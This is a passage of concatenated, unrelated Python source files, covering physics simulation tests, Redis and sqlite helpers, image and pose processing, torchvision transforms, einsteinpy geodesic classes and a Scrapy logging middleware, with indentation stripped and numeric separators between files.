y_vel = node.GetSolutionStepValue(KratosMultiphysics.VELOCITY_Y)
print(self.time, y_vel)
y_vel_ref = -3.3859516373258987
self.assertAlmostEqual(y_vel, y_vel_ref, delta=tol)
if np.isclose(self.time, 0.22, rtol=0.0, atol=1e-06):
y_vel = node.GetSolutionStepValue(KratosMultiphysics.VELOCITY_Y)
print(self.time, y_vel)
y_vel_ref = -0.5929799879392164
self.assertAlmostEqual(y_vel, y_vel_ref, delta=tol)
def Finalize(self):
self.procedures.RemoveFoldersWithResults(str(self.main_path), str(self.problem_name), '')
super().Finalize()
class DEM3D_SearchTolerance1(DEM3D_SearchToleranceMain):
def FinalizeSolutionStep(self):
KratosMultiphysics.DEMApplication.DEM_analysis_stage.DEMAnalysisStage.FinalizeSolutionStep(self)
for node in self.spheres_model_part.Nodes:
if node.Id == 2:
tol = 1.0e-15
if np.isclose(self.time, 0.02, rtol=0.0, atol=1e-06):
y_vel = node.GetSolutionStepValue(KratosMultiphysics.VELOCITY_Y)
print(self.time, y_vel)
y_vel_ref = -5.8654458179811835
self.assertAlmostEqual(y_vel, y_vel_ref, delta=tol)
if np.isclose(self.time, 0.115, rtol=0.0, atol=1e-06):
y_vel = node.GetSolutionStepValue(KratosMultiphysics.VELOCITY_Y)
print(self.time, y_vel)
y_vel_ref = -3.3861319639727263
self.assertAlmostEqual(y_vel, y_vel_ref, delta=tol)
if np.isclose(self.time, 0.22, rtol=0.0, atol=1e-06):
y_vel = node.GetSolutionStepValue(KratosMultiphysics.VELOCITY_Y)
print(self.time, y_vel)
y_vel_ref = -0.594495289987086
self.assertAlmostEqual(y_vel, y_vel_ref, delta=tol)
class DEM3D_SearchTolerance2(DEM3D_SearchToleranceMain):
def FinalizeSolutionStep(self):
KratosMultiphysics.DEMApplication.DEM_analysis_stage.DEMAnalysisStage.FinalizeSolutionStep(self)
for node in self.spheres_model_part.Nodes:
if node.Id == 2:
tol = 1.0e-15
if np.isclose(self.time, 0.02, rtol=0.0, atol=1e-06):
y_vel = node.GetSolutionStepValue(KratosMultiphysics.VELOCITY_Y)
print(self.time, y_vel)
y_vel_ref = -5.865445816566027
self.assertAlmostEqual(y_vel, y_vel_ref, delta=tol)
if np.isclose(self.time, 0.115, rtol=0.0, atol=1e-06):
y_vel = node.GetSolutionStepValue(KratosMultiphysics.VELOCITY_Y)
print(self.time, y_vel)
y_vel_ref = -3.386128017385994
self.assertAlmostEqual(y_vel, y_vel_ref, delta=tol)
if np.isclose(self.time, 0.22, rtol=0.0, atol=1e-06):
y_vel = node.GetSolutionStepValue(KratosMultiphysics.VELOCITY_Y)
print(self.time, y_vel)
y_vel_ref = -0.5941551772701182
self.assertAlmostEqual(y_vel, y_vel_ref, delta=tol)
class DEM3D_SearchTolerance3(DEM3D_SearchToleranceMain):
def FinalizeSolutionStep(self):
KratosMultiphysics.DEMApplication.DEM_analysis_stage.DEMAnalysisStage.FinalizeSolutionStep(self)
for node in self.spheres_model_part.Nodes:
if node.Id == 2:
tol = 1.0e-15
if np.isclose(self.time, 0.02, rtol=0.0, atol=1e-06):
y_vel = node.GetSolutionStepValue(KratosMultiphysics.VELOCITY_Y)
print(self.time, y_vel)
y_vel_ref = -5.86502139707038
self.assertAlmostEqual(y_vel, y_vel_ref, delta=tol)
if np.isclose(self.time, 0.115, rtol=0.0, atol=1e-06):
y_vel = node.GetSolutionStepValue(KratosMultiphysics.VELOCITY_Y)
print(self.time, y_vel)
y_vel_ref = -3.3859516373258987
self.assertAlmostEqual(y_vel, y_vel_ref, delta=tol)
if np.isclose(self.time, 0.22, rtol=0.0, atol=1e-06):
y_vel = node.GetSolutionStepValue(KratosMultiphysics.VELOCITY_Y)
print(self.time, y_vel)
y_vel_ref = -0.5929799879392164
self.assertAlmostEqual(y_vel, y_vel_ref, delta=tol)
class TestSearchTolerance(KratosUnittest.TestCase):
@classmethod
def test_SearchA(self):
path = os.path.join(os.path.dirname(os.path.realpath(__file__)), "test_search_tolerance")
parameters_file_name = os.path.join(path, "ProjectParametersDEM.json")
with open(parameters_file_name,'r') as parameter_file:
project_parameters = KratosMultiphysics.Parameters(parameter_file.read())
project_parameters["SearchTolerance"].SetDouble(0.0)
project_parameters["search_tolerance_against_walls"].SetDouble(0.0)
project_parameters["NeighbourSearchFrequency"].SetInt(1)
model = KratosMultiphysics.Model()
auxiliary_functions_for_tests.CreateAndRunStageInSelectedNumberOfOpenMPThreads(DEM3D_SearchToleranceMain, model, project_parameters, auxiliary_functions_for_tests.GetHardcodedNumberOfThreads())
@classmethod
def test_SearchB(self):
path = os.path.join(os.path.dirname(os.path.realpath(__file__)), "test_search_tolerance")
parameters_file_name = os.path.join(path, "ProjectParametersDEM.json")
with open(parameters_file_name,'r') as parameter_file:
project_parameters = KratosMultiphysics.Parameters(parameter_file.read())
project_parameters["SearchTolerance"].SetDouble(0.0)
project_parameters["search_tolerance_against_walls"].SetDouble(0.0)
project_parameters["NeighbourSearchFrequency"].SetInt(10)
model = KratosMultiphysics.Model()
auxiliary_functions_for_tests.CreateAndRunStageInSelectedNumberOfOpenMPThreads(DEM3D_SearchTolerance1, model, project_parameters, auxiliary_functions_for_tests.GetHardcodedNumberOfThreads())
@classmethod
def test_SearchC(self):
path = os.path.join(os.path.dirname(os.path.realpath(__file__)), "test_search_tolerance")
parameters_file_name = os.path.join(path, "ProjectParametersDEM.json")
with open(parameters_file_name,'r') as parameter_file:
project_parameters = KratosMultiphysics.Parameters(parameter_file.read())
project_parameters["SearchTolerance"].SetDouble(1e-04)
project_parameters["search_tolerance_against_walls"].SetDouble(1e-04)
project_parameters["NeighbourSearchFrequency"].SetInt(20)
model = KratosMultiphysics.Model()
auxiliary_functions_for_tests.CreateAndRunStageInSelectedNumberOfOpenMPThreads(DEM3D_SearchTolerance2, model, project_parameters, auxiliary_functions_for_tests.GetHardcodedNumberOfThreads())
@classmethod
def test_SearchD(self):
path = os.path.join(os.path.dirname(os.path.realpath(__file__)), "test_search_tolerance")
parameters_file_name = os.path.join(path, "ProjectParametersDEM.json")
with open(parameters_file_name,'r') as parameter_file:
project_parameters = KratosMultiphysics.Parameters(parameter_file.read())
project_parameters["SearchTolerance"].SetDouble(1e-03)
project_parameters["search_tolerance_against_walls"].SetDouble(1e-03)
project_parameters["NeighbourSearchFrequency"].SetInt(20)
model = KratosMultiphysics.Model()
auxiliary_functions_for_tests.CreateAndRunStageInSelectedNumberOfOpenMPThreads(DEM3D_SearchTolerance3, model, project_parameters, auxiliary_functions_for_tests.GetHardcodedNumberOfThreads())
if __name__ == "__main__":
Logger.GetDefaultOutput().SetSeverity(Logger.Severity.WARNING)
KratosUnittest.main()
|
61094
|
from flexinfer.misc import build_from_cfg, registry
def build_converter(cfg):
return build_from_cfg(cfg, registry, 'converter')
|
61104
|
def redis_key(project_slug, key, *namespaces):
"""
Generates project dependent Redis key
>>> redis_key('a', 'b')
'a:b'
>>> redis_key('a', 'b', 'c', 'd')
'a:c:d:b'
>>> redis_key('a', 1, 'c', None)
'a:c:1'
"""
l = [project_slug]
if namespaces:
l.extend(namespaces)
l.append(key)
return ':'.join(str(i)for i in l if i)
class RedisMixin:
project_slug = None
@classmethod
def redis_key(cls, key, namespace):
return redis_key(cls.project_slug, key, namespace)
@classmethod
async def redis(cls, request, key, *, value=None, sadd=None, expire=None,
default=None, namespace=None, smembers=False, srem=None,
delete=False, connection=None):
key = cls.redis_key(key, namespace)
async def _redis(cache):
if value:
await cache.set(key, value)
elif delete:
await cache.delete(key)
elif sadd:
if isinstance(sadd, (list, tuple)):
await cache.sadd(key, *sadd)
else:
await cache.sadd(key, sadd)
elif smembers:
v = await cache.smembers(key)
return v or default
elif srem:
return await cache.srem(key, srem)
elif not expire:
return (await cache.get(key)) or default
if expire:
await cache.expire(key, int(expire))
if connection is not None:
return await _redis(connection)
else:
async with request.app.redis.get() as connection:
return await _redis(connection)
|
61107
|
from .base_assigner import BaseAssigner
from .max_iou_assigner import MaxIoUAssigner
from .approx_max_iou_assigner import ApproxMaxIoUAssigner
from .assign_result import AssignResult
from .max_iou_assigner_hbb_cy import MaxIoUAssignerCy
from .max_iou_assigner_rbbox import MaxIoUAssignerRbbox
from .approx_max_iou_assigner_cy import ApproxMaxIoUAssignerCy
__all__ = [
'BaseAssigner', 'MaxIoUAssigner', 'ApproxMaxIoUAssigner', 'AssignResult',
'MaxIoUAssignerCy', 'MaxIoUAssignerRbbox','ApproxMaxIoUAssignerCy'
]
|
61114
|
import numpy as np
import scipy
import cv2
def get_pixel_neighbors(height, width):
"""
Estimate the 4 neighbors of every pixel in an image
:param height: image height
:param width: image width
:return: pixel index - neighbor index lists
"""
pix_id = []
neighbor_id = []
for i in range(height):
for j in range(width):
n = []
if i == 0:
n = n + [(i + 1) * width + j]
elif i == height - 1:
n = n + [(i - 1) * width + j]
else:
n = n + [(i + 1) * width + j, (i - 1) * width + j]
if j == 0:
n = n + [i * width + j + 1]
elif j == width - 1:
n = n + [i * width + j - 1]
else:
n = n + [i * width + j + 1, i * width + j - 1]
for k in n:
pix_id.append(i*width+j)
neighbor_id.append(k)
return pix_id, neighbor_id
limps = np.array(
[[0, 1], [1, 2], [2, 3], [3, 4], [1, 5], [5, 6], [6, 7], [1, 11], [11, 12], [12, 13], [1, 8],
[8, 9], [9, 10], [14, 15], [16, 17], [0, 14], [0, 15], [14, 16], [15, 17]])
def get_instance_skeleton_buffer(h, w, poses):
output = np.zeros((h, w, 3), dtype=np.float32) - 1
for i in range(len(poses)):
keypoints = poses[i]
lbl = i
for k in range(limps.shape[0]):
kp1, kp2 = limps[k, :].astype(int)
bone_start = keypoints[kp1, :]
bone_end = keypoints[kp2, :]
bone_start[0] = np.maximum(np.minimum(bone_start[0], w - 1), 0.)
bone_start[1] = np.maximum(np.minimum(bone_start[1], h - 1), 0.)
bone_end[0] = np.maximum(np.minimum(bone_end[0], w - 1), 0.)
bone_end[1] = np.maximum(np.minimum(bone_end[1], h - 1), 0.)
if bone_start[2] > 0.0:
output[int(bone_start[1]), int(bone_start[0])] = 1
cv2.circle(output, (int(bone_start[0]), int(bone_start[1])), 2, (lbl, 0, 0), -1)
if bone_end[2] > 0.0:
output[int(bone_end[1]), int(bone_end[0])] = 1
cv2.circle(output, (int(bone_end[0]), int(bone_end[1])), 2, (lbl, 0, 0), -1)
if bone_start[2] > 0.0 and bone_end[2] > 0.0:
cv2.line(output, (int(bone_start[0]), int(bone_start[1])), (int(bone_end[0]), int(bone_end[1])), (lbl, 0, 0), 1)
return output[:, :, 0]
def get_poseimg_for_opt(sel_pose, poseimg, init_mask, n_bg=50):
h, w = init_mask.shape[:2]
bg_label = 1
output = np.zeros((h, w, 3), dtype=np.float32) - 1
II, JJ = (poseimg > 0).nonzero()
Isel, J_sel = (poseimg == sel_pose).nonzero()
output[II, JJ] = 0
output[Isel, J_sel] = 2
init_mask[Isel, J_sel] = 1
# Sample also from points in the field
init_mask = cv2.dilate(init_mask, np.ones((25, 25), np.uint8), iterations=1)
I_bg, J_bg = (init_mask == 0).nonzero()
rand_index = np.random.permutation(len(I_bg))[:n_bg]
bg_points = np.array([J_bg[rand_index], I_bg[rand_index]]).T
for k in range(bg_points.shape[0]):
cv2.circle(output, (int(bg_points[k, 0]), int(bg_points[k, 1])), 2, (bg_label, 0, 0), -1)
return output[:, :, 0]
def draw_poses_for_optimization(sel_pose, keypoints_list, init_mask, n_bg=50):
h, w = init_mask.shape[:2]
bg_label = 0
output = np.zeros((h, w, 3), dtype=np.float32)-1
for i in range(len(keypoints_list)):
keypoints = keypoints_list[i]
if i == sel_pose:
lbl = 2
else:
lbl = 1
for k in range(limps.shape[0]):
kp1, kp2 = limps[k, :].astype(int)
bone_start = keypoints[kp1, :]
bone_end = keypoints[kp2, :]
bone_start[0] = np.maximum(np.minimum(bone_start[0], w - 1), 0.)
bone_start[1] = np.maximum(np.minimum(bone_start[1], h - 1), 0.)
bone_end[0] = np.maximum(np.minimum(bone_end[0], w - 1), 0.)
bone_end[1] = np.maximum(np.minimum(bone_end[1], h - 1), 0.)
if bone_start[2] > 0.0:
output[int(bone_start[1]), int(bone_start[0])] = 1
cv2.circle(output, (int(bone_start[0]), int(bone_start[1])), 2, (lbl, 0, 0), -1)
if bone_end[2] > 0.0:
output[int(bone_end[1]), int(bone_end[0])] = 1
cv2.circle(output, (int(bone_end[0]), int(bone_end[1])), 2, (lbl, 0, 0), -1)
if bone_start[2] > 0.0 and bone_end[2] > 0.0:
cv2.line(output, (int(bone_start[0]), int(bone_start[1])), (int(bone_end[0]), int(bone_end[1])), (lbl, 0, 0), 1)
# Draw circles for the bg players keypoints
# for k in range(bg_keypoints.shape[0]):
# cv2.circle(output, (int(bg_keypoints[k, 0]), int(bg_keypoints[k, 1])), 2, (bg_keypoint_lable, 0, 0), -1)
# Sample also from points in the field
init_mask = cv2.dilate(init_mask, np.ones((5, 5), np.uint8), iterations=1)
I_bg, J_bg = (init_mask == 0).nonzero()
rand_index = np.random.permutation(len(I_bg))[:n_bg]
bg_points = np.array([J_bg[rand_index], I_bg[rand_index]]).T
for k in range(bg_points.shape[0]):
cv2.circle(output, (int(bg_points[k, 0]), int(bg_points[k, 1])), 2, (bg_label, 0, 0), -1)
return output[:, :, 0]
def set_U(strokes, h, w, dim):
N = h*w
y = np.zeros((N, dim))
U = scipy.sparse.lil_matrix((N, N))
for p in range(strokes.shape[0]):
i = strokes[p, 1]
j = strokes[p, 0]
index = int(i * w + j)
for ii in range(dim):
y[index, ii] = strokes[p, ii+2]
U[index, index] = 1
return U, y
def set_DW(image, edges=None, sigma1=1000., sigma2=0.01):
image = image.astype(float)
h, w = image.shape[0:2]
N = h * w
pixd, neighborid = get_pixel_neighbors(h, w)
i, j = np.unravel_index(pixd, (h, w))
ii, jj = np.unravel_index(neighborid, (h, w))
pix_diff = np.squeeze((image[i, j, :] - image[ii, jj, :]) ** 2)
if len(pix_diff.shape) == 1:
pix_diff = pix_diff[:, np.newaxis]
weight0 = np.exp(-(np.sum(pix_diff, axis=1)) / sigma1)
weight1 = np.exp(-((edges[i, j]) ** 2) / sigma2)
# neighbor_info = np.vstack((pixd, neighborid, weight0)).T
M = len(pixd)
D = scipy.sparse.lil_matrix((M, N))
W = scipy.sparse.lil_matrix((M, M))
p = np.arange(0, M, 1)
D[p, pixd] = 1
D[p, neighborid] = -1
W[p, p] = weight1
return D, W
|
61118
|
import sqlite3
import os
DB_SAVES_DIR = 'saves'
class DB:
def __init__(self, name):
self.name = name
self.path = '{}/{}.db'.format(DB_SAVES_DIR, self.name)
if not os.path.isdir(DB_SAVES_DIR):
os.makedirs(DB_SAVES_DIR)
self.conn = sqlite3.connect(self.path)
def save(self):
# Clear the old db.
self.conn.close()
os.remove('saves/{}.db'.format(self.name))
self.conn = sqlite3.connect(self.path)
self.setup()
def query(self, fname, params=None):
with open(fname) as f:
contents = f.read()
result = []
cursor = self.conn.cursor()
for query in contents.split(';'):
if params is None:
cursor.execute(query)
else:
cursor.execute(query, params)
res = cursor.fetchall()
if len(res) > 0:
for row in res:
result.append({})
for i, col in enumerate(cursor.description):
result[-1][col[0]] = row[i]
return result
def execute(self, fname, params=None):
with open(fname) as f:
contents = f.read()
for statement in contents.split(';'):
cursor = self.conn.cursor()
if params is None:
cursor.execute(statement)
else:
cursor.execute(statement, params)
self.conn.commit()
def setup(self):
# Create all the tables
self.execute('db/setup/gen_log.sql')
self.execute('db/setup/nations.sql')
self.execute('db/setup/names.sql')
self.execute('db/setup/name_modifiers.sql')
self.execute('db/setup/name_places.sql')
self.execute('db/setup/relations.sql')
self.execute('db/setup/nation_relationship.sql')
self.execute('db/setup/groups.sql')
self.execute('db/setup/weapons.sql')
self.execute('db/setup/weapon_stats.sql')
self.execute('db/setup/armors.sql')
self.execute('db/setup/equipment_list.sql')
self.execute('db/setup/treaties.sql')
self.execute('db/setup/events.sql')
self.execute('db/setup/event_types.sql')
self.execute('db/setup/event_data.sql')
self.execute('db/setup/cells.sql')
self.execute('db/setup/buildings.sql')
self.conn.commit()
|
61136
|
import unittest
def setUpModule():
print("in module {} - setUpModule()".format(__name__))
def tearDownModule():
print("in module {} - tearDownModule()".format(__name__))
class TextFixtures(unittest.TestCase):
@classmethod
def setUpClass(cls):
print('in class {} - setUpClass()'.format(cls.__name__))
@classmethod
def tearDownClass(cls):
print('in class {} - tearDownClass()'.format(cls.__name__))
def setUp(self):
print('in setup()')
def tearDown(self):
print('in tearDown()')
def test_1 (self):
print('in test_1()')
def test_2 (self):
print('in test_2()')
if __name__ == '__main__':
unittest.main()
|
61137
|
import os
import numpy as np
import torch
from torchvision import models, transforms
MODELS = {'densenet121': models.densenet121,
'resnet152': models.resnet152}
DEVICE = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
ANALYZERS = ['grad', 'smooth-grad', 'smooth-taylor', 'ig', 'lrp']
IG_BASELINES = ['zero', 'noise']
# ImageNet transform constants
DEFAULT_TRANSFORM = transforms.Compose([
transforms.Resize(256), # resize image to 256X256 pixels
transforms.CenterCrop(224), # crop the image to 224X224 pixels about the center
transforms.ToTensor(), # convert the image to PyTorch Tensor data type
transforms.Normalize( # Normalize by setting the mean and s.d. to specified values
mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225]
)
])
NORMALIZE_TRANSFORM = transforms.Compose([
transforms.Normalize( # Normalize by setting the mean and s.d. to specified values
mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225]
)
])
RESIZE_TRANSFORM = transforms.Compose([
transforms.Resize(256), # resize image to 256X256 pixels
transforms.CenterCrop(224), # crop the image to 224X224 pixels about the center
])
INVERSE_TRANSFORM = transforms.Compose([
transforms.Normalize( # Normalize by setting the mean and s.d. to specified values
mean=[-0.485 / 0.229, -0.456 / 0.224, -0.406 / 0.225],
std=[1 / 0.229, 1 / 0.224, 1 / 0.225]
)
])
|
61138
|
import warnings
import numpy as np
from einsteinpy.integrators import GeodesicIntegrator
from .utils import _P, _kerr, _kerrnewman, _sch
class Geodesic:
"""
Base Class for defining Geodesics
Working in Geometrized Units (M-Units),
with :math:`c = G = M = k_e = 1`
"""
def __init__(
self,
metric,
metric_params,
position,
momentum,
time_like=True,
return_cartesian=True,
**kwargs,
):
"""
Constructor
Parameters
----------
metric : str
Name of the metric. Currently, these metrics are supported:
1. Schwarzschild
2. Kerr
3. KerrNewman
metric_params : array_like
Tuple of parameters to pass to the metric
E.g., ``(a,)`` for Kerr
position : array_like
3-Position
4-Position is initialized by taking ``t = 0.0``
momentum : array_like
3-Momentum
4-Momentum is calculated automatically,
considering the value of ``time_like``
time_like : bool, optional
Determines type of Geodesic
``True`` for Time-like geodesics
``False`` for Null-like geodesics
Defaults to ``True``
return_cartesian : bool, optional
Whether to return calculated positions in Cartesian Coordinates
This only affects the coordinates. Momenta are dimensionless
quantities, and are returned in Spherical Polar Coordinates.
Defaults to ``True``
kwargs : dict
Keyword parameters for the Geodesic Integrator
See 'Other Parameters' below.
Other Parameters
----------------
steps : int
Number of integration steps
Defaults to ``50``
delta : float
Initial integration step-size
Defaults to ``0.5``
rtol : float
Relative Tolerance
Defaults to ``1e-2``
atol : float
Absolute Tolerance
Defaults to ``1e-2``
order : int
Integration Order
Defaults to ``2``
omega : float
Coupling between Hamiltonian Flows
Smaller values imply smaller integration error, but too
small values can make the equation of motion non-integrable.
For non-capture trajectories, ``omega = 1.0`` is recommended.
For trajectories, that either lead to a capture or a grazing
geodesic, a decreased value of ``0.01`` or less is recommended.
Defaults to ``1.0``
suppress_warnings : bool
Whether to suppress warnings during simulation
Warnings are shown for every step, where numerical errors
exceed specified tolerance (controlled by ``rtol`` and ``atol``)
Defaults to ``False``
"""
# Contravariant Metrics, defined so far
_METRICS = {
"Schwarzschild": _sch,
"Kerr": _kerr,
"KerrNewman": _kerrnewman,
}
if metric not in _METRICS:
raise NotImplementedError(
f"'{metric}' is unsupported. Currently, these metrics are supported:\
\n1. Schwarzschild\n2. Kerr\n3. KerrNewman"
)
self.metric_name = metric
self.metric = _METRICS[metric]
self.metric_params = metric_params
if metric == "Schwarzschild":
self.metric_params = (0.0,)
self.position = np.array([0.0, *position])
self.momentum = _P(
self.metric, metric_params, self.position, momentum, time_like
)
self.time_like = time_like
self.kind = "Time-like" if time_like else "Null-like"
self.coords = "Cartesian" if return_cartesian else "Spherical Polar"
self._trajectory = self.calculate_trajectory(**kwargs)
def __repr__(self):
return f"""Geodesic Object:(\n\
Type : ({self.kind}),\n\
Metric : ({self.metric_name}),\n\
Metric Parameters : ({self.metric_params}),\n\
Initial 4-Position : ({self.position}),\n\
Initial 4-Momentum : ({self.momentum}),\n\
Trajectory = (\n\
{self.trajectory}\n\
),\n\
Output Position Coordinate System = ({self.coords})\n\
))"""
def __str__(self):
return self.__repr__()
@property
def trajectory(self):
"""
Returns the trajectory of the test particle
"""
return self._trajectory
def calculate_trajectory(self, **kwargs):
"""
Calculate trajectory in spacetime
Parameters
----------
kwargs : dict
Keyword parameters for the Geodesic Integrator
See 'Other Parameters' below.
Returns
-------
~numpy.ndarray
N-element numpy array, containing step count
~numpy.ndarray
Shape-(N, 8) numpy array, containing
(4-Position, 4-Momentum) for each step
Other Parameters
----------------
steps : int
Number of integration steps
Defaults to ``50``
delta : float
Initial integration step-size
Defaults to ``0.5``
rtol : float
Relative Tolerance
Defaults to ``1e-2``
atol : float
Absolute Tolerance
Defaults to ``1e-2``
order : int
Integration Order
Defaults to ``2``
omega : float
Coupling between Hamiltonian Flows
Smaller values imply smaller integration error, but too
small values can make the equation of motion non-integrable.
For non-capture trajectories, ``omega = 1.0`` is recommended.
For trajectories, that either lead to a capture or a grazing
geodesic, a decreased value of ``0.01`` or less is recommended.
Defaults to ``1.0``
suppress_warnings : bool
Whether to suppress warnings during simulation
Warnings are shown for every step, where numerical errors
exceed specified tolerance (controlled by ``rtol`` and ``atol``)
Defaults to ``False``
"""
g, g_prms = self.metric, self.metric_params
q0, p0 = self.position, self.momentum
tl = self.time_like
N = kwargs.get("steps", 50)
dl = kwargs.get("delta", 0.5)
rtol = kwargs.get("rtol", 1e-2)
atol = kwargs.get("atol", 1e-2)
order = kwargs.get("order", 2)
omega = kwargs.get("omega", 1.0)
sw = kwargs.get("suppress_warnings", False)
steps = np.arange(N)
geodint = GeodesicIntegrator(
metric=g,
metric_params=g_prms,
q0=q0,
p0=p0,
time_like=tl,
steps=N,
delta=dl,
rtol=rtol,
atol=atol,
order=order,
omega=omega,
suppress_warnings=sw,
)
for i in steps:
geodint.step()
vecs = np.array(geodint.results, dtype=float)
q1 = vecs[:, 0]
p1 = vecs[:, 1]
results = np.hstack((q1, p1))
# Ignoring
# q2 = vecs[:, 2]
# p2 = vecs[:, 3]
if self.coords == "Cartesian":
# Converting to Cartesian from Spherical Polar Coordinates
# Note that momenta cannot be converted this way,
# due to ambiguities in the signs of v_r and v_th (velocities)
t, r, th, ph = q1.T
pt, pr, pth, pph = p1.T
x = r * np.sin(th) * np.cos(ph)
y = r * np.sin(th) * np.sin(ph)
z = r * np.cos(th)
cart_results = np.vstack((t, x, y, z, pt, pr, pth, pph)).T
return steps, cart_results
return steps, results
class Nulllike(Geodesic):
"""
Class for defining Null-like Geodesics
"""
def __init__(
self, metric, metric_params, position, momentum, return_cartesian=True, **kwargs
):
"""
Constructor
Parameters
----------
metric : str
Name of the metric. Currently, these metrics are supported:
1. Schwarzschild
2. Kerr
3. KerrNewman
metric_params : array_like
Tuple of parameters to pass to the metric
E.g., ``(a,)`` for Kerr
position : array_like
3-Position
4-Position is initialized by taking ``t = 0.0``
momentum : array_like
3-Momentum
4-Momentum is calculated automatically,
considering the value of ``time_like``
return_cartesian : bool, optional
Whether to return calculated positions in Cartesian Coordinates
This only affects the coordinates. The momenta dimensionless
quantities, and are returned in Spherical Polar Coordinates.
Defaults to ``True``
kwargs : dict
Keyword parameters for the Geodesic Integrator
See 'Other Parameters' below.
Other Parameters
----------------
steps : int
Number of integration steps
Defaults to ``50``
delta : float
Initial integration step-size
Defaults to ``0.5``
rtol : float
Relative Tolerance
Defaults to ``1e-2``
atol : float
Absolute Tolerance
Defaults to ``1e-2``
order : int
Integration Order
Defaults to ``2``
omega : float
Coupling between Hamiltonian Flows
Smaller values imply smaller integration error, but too
small values can make the equation of motion non-integrable.
For non-capture trajectories, ``omega = 1.0`` is recommended.
For trajectories, that either lead to a capture or a grazing
geodesic, a decreased value of ``0.01`` or less is recommended.
Defaults to ``1.0``
suppress_warnings : bool
Whether to suppress warnings during simulation
Warnings are shown for every step, where numerical errors
exceed specified tolerance (controlled by ``rtol`` and ``atol``)
Defaults to ``False``
"""
super().__init__(
metric=metric,
metric_params=metric_params,
position=position,
momentum=momentum,
time_like=False,
return_cartesian=return_cartesian,
**kwargs,
)
class Timelike(Geodesic):
"""
Class for defining Time-like Geodesics
"""
def __init__(
self, metric, metric_params, position, momentum, return_cartesian=True, **kwargs
):
"""
Constructor
Parameters
----------
metric : str
Name of the metric. Currently, these metrics are supported:
1. Schwarzschild
2. Kerr
3. KerrNewman
metric_params : array_like
Tuple of parameters to pass to the metric
E.g., ``(a,)`` for Kerr
position : array_like
3-Position
4-Position is initialized by taking ``t = 0.0``
momentum : array_like
3-Momentum
4-Momentum is calculated automatically,
considering the value of ``time_like``
return_cartesian : bool, optional
Whether to return calculated positions in Cartesian Coordinates
This only affects the coordinates. The momenta dimensionless
quantities, and are returned in Spherical Polar Coordinates.
Defaults to ``True``
kwargs : dict
Keyword parameters for the Geodesic Integrator
See 'Other Parameters' below.
Other Parameters
----------------
steps : int
Number of integration steps
Defaults to ``50``
delta : float
Initial integration step-size
Defaults to ``0.5``
rtol : float
Relative Tolerance
Defaults to ``1e-2``
atol : float
Absolute Tolerance
Defaults to ``1e-2``
order : int
Integration Order
Defaults to ``2``
omega : float
Coupling between Hamiltonian Flows
Smaller values imply smaller integration error, but too
small values can make the equation of motion non-integrable.
For non-capture trajectories, ``omega = 1.0`` is recommended.
For trajectories, that either lead to a capture or a grazing
geodesic, a decreased value of ``0.01`` or less is recommended.
Defaults to ``1.0``
suppress_warnings : bool
Whether to suppress warnings during simulation
Warnings are shown for every step, where numerical errors
exceed specified tolerance (controlled by ``rtol`` and ``atol``)
Defaults to ``False``
"""
super().__init__(
metric=metric,
metric_params=metric_params,
position=position,
momentum=momentum,
time_like=True,
return_cartesian=return_cartesian,
**kwargs,
)
|
61190
|
from ksc.backends import common
from ksc.backends import abstract
from ksc.backends import jax
from ksc.backends import jax_input_last
|
61198
|
from linz_logger import get_log
from topo_processor.util import time_in_ms
from .get_fs import get_fs
def transfer_file(source_file: str, checksum: str, content_type, target_file: str):
start_time = time_in_ms()
with get_fs(source_file).open(source_file, "rb") as f1:
data = f1.read()
with get_fs(target_file).open(target_file, "wb", ContentType=content_type, Metadata={"hash": checksum}) as f2:
f2.write(data)
get_log().debug(
"File transferred", source_file=source_file, target_file=target_file, duration=time_in_ms() - start_time
)
|
61221
|
import json
import time
from typing import Dict
from scrapy.exceptions import NotConfigured
from scrapy.http.response.html import HtmlResponse
from scrapy_cdr import CDRItem
from dd_crawler.utils import get_domain
class RequestLogMiddleware:
def __init__(self, *, jl_logger, relevancy_threshold: float):
# This are per-worker values, while stats values updated in
# dd_crawler.queue are global.
self.domains = set()
self.relevant_domains = set()
self.total_score = 0.
self.n_crawled = 0
self.jl_logger = jl_logger
self.relevancy_threshold = relevancy_threshold
@classmethod
def from_crawler(cls, crawler) -> 'RequestLogMiddleware':
log_path = crawler.settings.get('RESPONSE_LOG_FILE')
if not log_path:
raise NotConfigured('RESPONSE_LOG_FILE not defined')
jl_logger = get_jl_logger(log_path)
threshold = crawler.settings.getfloat('PAGE_RELEVANCY_THRESHOLD', 0.5)
return cls(jl_logger=jl_logger, relevancy_threshold=threshold)
def process_spider_output(self, response, result, spider):
for item in result:
if isinstance(item, CDRItem):
self.log_item(item, response)
yield item
def log_item(self, item: CDRItem, response: HtmlResponse):
self.n_crawled += 1
domain = get_domain(item['url'])
self.domains.add(domain)
metadata = item.get('metadata', {})
score = metadata.get('page_score', 0.)
if score is not None:
self.total_score += score
if score > self.relevancy_threshold:
self.relevant_domains.add(domain)
log_entry = {
'time': time.time(),
'url': response.url,
'id': metadata.get('id'),
'parent': metadata.get('parent'),
'depth': response.meta.get('depth', ''),
'priority': response.request.priority,
'score': score,
'total_score': self.total_score,
'n_crawled': self.n_crawled,
'n_domains': len(self.domains),
'n_relevant_domains': len(self.relevant_domains),
}
if metadata.get('has_login_form'):
log_entry['has_login_form'] = True
if 'autologin_active' in response.meta:
log_entry['login_success'] = response.meta['autologin_active']
self.jl_logger.write_entry(log_entry)
class JsonLinesLogger:
def __init__(self, log_path):
self._log_file = open(log_path, 'at')
def write_entry(self, log_entry: Dict):
json.dump(log_entry, self._log_file)
self._log_file.write('\n')
self._log_file.flush()
_loggers = {}
def get_jl_logger(log_path):
if log_path not in _loggers:
_loggers[log_path] = JsonLinesLogger(log_path)
return _loggers[log_path]
|
61226
|
import pandas as pd
def lookup_dates(s):
"""
This is an extremely fast approach to datetime parsing.
For large data, the same dates are often repeated. Rather than
re-parse these, we store all unique dates, parse them, and
use a lookup to convert all dates.
"""
dates_dict = {date:pd.to_datetime(date,errors='coerce') for date in s.unique()}
return s.map(dates_dict)
def end_quarter(series):
return (series - pd.tseries.offsets.DateOffset(days=1) + pd.tseries.offsets.QuarterEnd())
|
61235
|
from mongoengine import Document, StringField, BooleanField, IntField, ListField, ReferenceField, EmailField, LongField
from mongoengine import NULLIFY, PULL
class User(Document):
ID = LongField(unique=True, required=True)
Username = StringField(required=True)
Password = StringField()
IsLock = BooleanField(required=True)
|
61247
|
import torch
from torch import nn
from torch.nn import functional as F
from .resnet import resnet18, resnet34
